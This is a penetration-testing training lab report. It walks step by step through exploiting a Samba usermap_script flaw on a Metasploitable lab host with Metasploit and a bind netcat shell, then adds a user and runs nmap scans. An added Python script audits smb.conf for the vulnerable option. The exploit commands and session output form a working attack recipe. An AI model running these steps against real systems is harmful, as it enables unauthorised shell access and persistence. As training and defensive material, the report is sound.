Penetration Testing Lab Report (China Mobile Security Department)

Content published/updated: 2024/4/27 14:57:11, Monday

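Penetration testing training, March 13

Day 1: summary of the main labs

First, a Struts2 vulnerability was exploited; it allows arbitrary commands to be executed directly and control of the host to be obtained.

Lab environment:

Kali Linux as the attack tool; owasp as the target machine

2003, Metasploitable: confirmed to be successfully reachable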

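Use Metasploit to attack the Samba service on the target machine and obtain shell access:

search samba                        find modules
use multi/samba/usermap_script      select the exploit module
show payloads                       list the payloads compatible with this exploit module
set payload cmd/unix/bind_netcat    use netcat to run a shell after the exploit succeeds
show options                        show the parameters that need to be set
set RHOST 10.10.10.254              set the target host
exploit                             launch the attack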

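1. First install the VM software, start Kali, owasp, Metasploitable and the other tools, and build the environment so that the network is reachable. Use NAT mode for the network configuration, with the address range 10.10.10.0/24.

2. Start the Kali VM and switch to root.

First enter msfconsole and change the initial password to 123456:

msf > passwd
[*] exec: passwd

输入新的 UNIX 密码:
重新输入新的 UNIX 密码:
passwd:已成功更新密码

Then search for Samba modules:

msf > search samba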

Matching Modules
================

Name                                            Disclosure Date  Rank       Description
----                                            ---------------  ----       -----------
auxiliary/admin/smb/samba_symlink_traversal                      normal     Samba Symlink Directory Traversal
auxiliary/dos/samba/lsa_addprivs_heap                            normal     Samba lsa_io_privilege_set Heap Overflow
auxiliary/dos/samba/lsa_transnames_heap                          normal     Samba lsa_io_trans_names Heap Overflow
auxiliary/dos/samba/read_nttrans_ea_list                         normal     Samba read_nttrans_ea_list Integer Overflow
exploit/freebsd/samba/trans2open                2003-04-07       great      Samba trans2open Overflow (*BSD x86)
exploit/linux/samba/chain_reply                 2010-06-16       good       Samba chain_reply Memory Corruption (Linux x86)
exploit/linux/samba/lsa_transnames_heap         2007-05-14       good       Samba lsa_io_trans_names Heap Overflow
exploit/linux/samba/setinfopolicy_heap          2012-04-10       normal     Samba SetInformationPolicy AuditEventsInfo Heap Overflow
exploit/linux/samba/trans2open                  2003-04-07       great      Samba trans2open Overflow (Linux x86)
exploit/multi/samba/nttrans                     2003-04-07       average    Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
exploit/multi/samba/usermap_script              2007-05-14       excellent  Samba \map script\
exploit/osx/samba/lsa_transnames_heap           2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
exploit/osx/samba/trans2open                    2003-04-07       great      Samba trans2open Overflow (Mac OS X PPC)
exploit/solaris/samba/lsa_transnames_heap       2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
exploit/solaris/samba/trans2open                2003-04-07       great      Samba trans2open Overflow (Solaris SPARC)
exploit/unix/misc/distcc_exec                   2002-02-01       excellent  DistCC Daemon Command Execution
exploit/unix/webapp/citrix_access_gateway_exec  2010-12-21       excellent  Citrix Access Gateway Command Execution
exploit/windows/http/sambar6_search_results     2003-06-21       normal     Sambar 6 Search Results Buffer Overflow
exploit/windows/license/calicclnt_getconfig     2005-03-02       average    Computer Associates License Client GETCONFIG Overflow
post/linux/gather/enum_configs                                   normal     Linux Gather Configurations

Select the exploit module:

msf > use multi/samba/usermap_script

List the payloads compatible with this exploit module:

msf exploit(usermap_script) > show payloads

Compatible Payloads
===================

Name                                Disclosure Date  Rank    Description
----                                ---------------  ----    -----------
cmd/unix/bind_awk                                    normal  Unix Command Shell, Bind TCP (via AWK)
cmd/unix/bind_inetd                                  normal  Unix Command Shell, Bind TCP (inetd)
cmd/unix/bind_lua                                    normal  Unix Command Shell, Bind TCP (via Lua)
cmd/unix/bind_netcat                                 normal  Unix Command Shell, Bind TCP (via netcat)
cmd/unix/bind_netcat_gaping                          normal  Unix Command Shell, Bind TCP (via netcat -e)
cmd/unix/bind_netcat_gaping_ipv6                     normal  Unix Command Shell, Bind TCP (via netcat -e) IPv6
cmd/unix/bind_perl                                   normal  Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6                              normal  Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby                                   normal  Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6                              normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/bind_zsh                                    normal  Unix Command Shell, Bind TCP (via Zsh)
cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
cmd/unix/reverse                                     normal  Unix Command Shell, Double Reverse TCP (telnet)
cmd/unix/reverse_awk                                 normal  Unix Command Shell, Reverse TCP (via AWK)
cmd/unix/reverse_lua                                 normal  Unix Command Shell, Reverse TCP (via Lua)
cmd/unix/reverse_netcat                              normal  Unix Command Shell, Reverse TCP (via netcat)
cmd/unix/reverse_netcat_gaping                       normal  Unix Command Shell, Reverse TCP (via netcat -e)
cmd/unix/reverse_openssl                             normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
cmd/unix/reverse_perl                                normal  Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_php_ssl                             normal  Unix Command Shell, Reverse TCP SSL (via php)
cmd/unix/reverse_python                              normal  Unix Command Shell, Reverse TCP (via Python)
cmd/unix/reverse_python_ssl                          normal  Unix Command Shell, Reverse TCP SSL (via python)
cmd/unix/reverse_ruby                                normal  Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
cmd/unix/reverse_zsh                                 normal  Unix Command Shell, Reverse TCP (via Zsh)

Choose the netcat payload, which runs a shell after the exploit succeeds:

msf exploit(usermap_script) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat

Show the parameters that need to be set:

msf exploit(usermap_script) > show options

Set the target host:

msf exploit(usermap_script) > set RHOST 10.10.10.254
RHOST => 10.10.10.254

Launch the attack:

msf exploit(usermap_script) > exploit

[*] Started bind handler
[*] Command shell session 1 opened (10.10.10.128:56558 -> 10.10.10.254:4444) at 2015-03-13 16:06:40 +0800

Control of host 10.10.10.254 has now been obtained, and a user can be added:

useradd test

The user was added successfully.
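Added example, not part of the original report: the usermap_script module used above only works against a Samba server whose smb.conf sets the non-default "username map script" option, so a defender can audit the configuration for it. The function name and both sample configurations are constructed for illustration; matching follows smb.conf rules (parameter names are case-insensitive and whitespace inside them is ignored), which a plain grep for the literal string misses.

```python
import re

# Samba treats section and parameter names as case-insensitive and ignores
# whitespace inside them, so normalise before comparing.
def _norm(name):
    return re.sub(r"\s+", "", name).lower()

RISKY = _norm("username map script")

def find_username_map_script(conf_text):
    """Return [(section, line_no, value)] for each active 'username map script'."""
    findings = []
    section, pending, start_line = None, "", 0
    for no, raw in enumerate(conf_text.splitlines(), 1):
        line = raw.strip()
        if not pending:
            start_line = no                 # first line of a (possibly continued) entry
        if line.endswith("\\"):             # trailing backslash continues the line
            pending += line[:-1]
            continue
        line = (pending + line).strip()
        pending = ""
        if not line or line[0] in "#;":     # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        name, sep, value = line.partition("=")   # only the first '=' is significant
        if sep and _norm(name) == RISKY and value.strip():
            findings.append((section, start_line, value.strip()))
    return findings

# Constructed smb.conf samples (not taken from the lab hosts).
VULNERABLE_CONF = """\
[global]
   workgroup = WORKGROUP
   UserName  Map Script = /etc/samba/scripts/mapusers.sh %u
"""
HARDENED_CONF = """\
[global]
   workgroup = WORKGROUP
   ; username map script = /etc/samba/scripts/mapusers.sh %u
   username map = /etc/samba/smbusers
"""

if __name__ == "__main__":
    for label, conf in (("vulnerable", VULNERABLE_CONF), ("hardened", HARDENED_CONF)):
        print(label, find_username_map_script(conf))
```

Any finding means the option should be removed or the server upgraded to a fixed Samba release before the host is exposed to untrusted clients.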

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

Host discovery: -PU -sn performs a UDP ping without listing services; -Pn does not use ping

nmap -sS -Pn xx.xx.xx.xx                        TCP SYN scan, no ICMP sent
nmap -sV -Pn xx.xx.xx.xx                        list detailed service information
nmap -PO -script=smb-check-vulns xx.xx.xx.xx    look for the MS08-067 vulnerability

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

nmap site scan

msf > nmap

msf > nmap -sV -Pn 10.10.10.254
[*] exec: nmap -sV -Pn 10.10.10.254

Starting Nmap 6.46 ( ) at 2015-03-13 16:38 CST
Nmap scan report for 10.10.10.254
Host is up (0.00020s latency).
All 1000 scanned ports on 10.10.10.254 are filtered
MAC Address: 00:50:56:E7:1B:31 (VMware)

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 22.84 seconds

msf > nmap -PO -script=smb-check-vulns 10.10.10.254
[*] exec: nmap -PO -script=smb-check-vulns 10.10.10.254

Starting Nmap 6.46 ( ) at 2015-03-13 16:47 CST
Nmap scan report for 10.10.10.254
Host is up (0.00021s latency).
All 1000 scanned ports on 10.10.10.254 are filtered
MAC Address: 00:50:56:E7:1B:31 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 23.06 seconds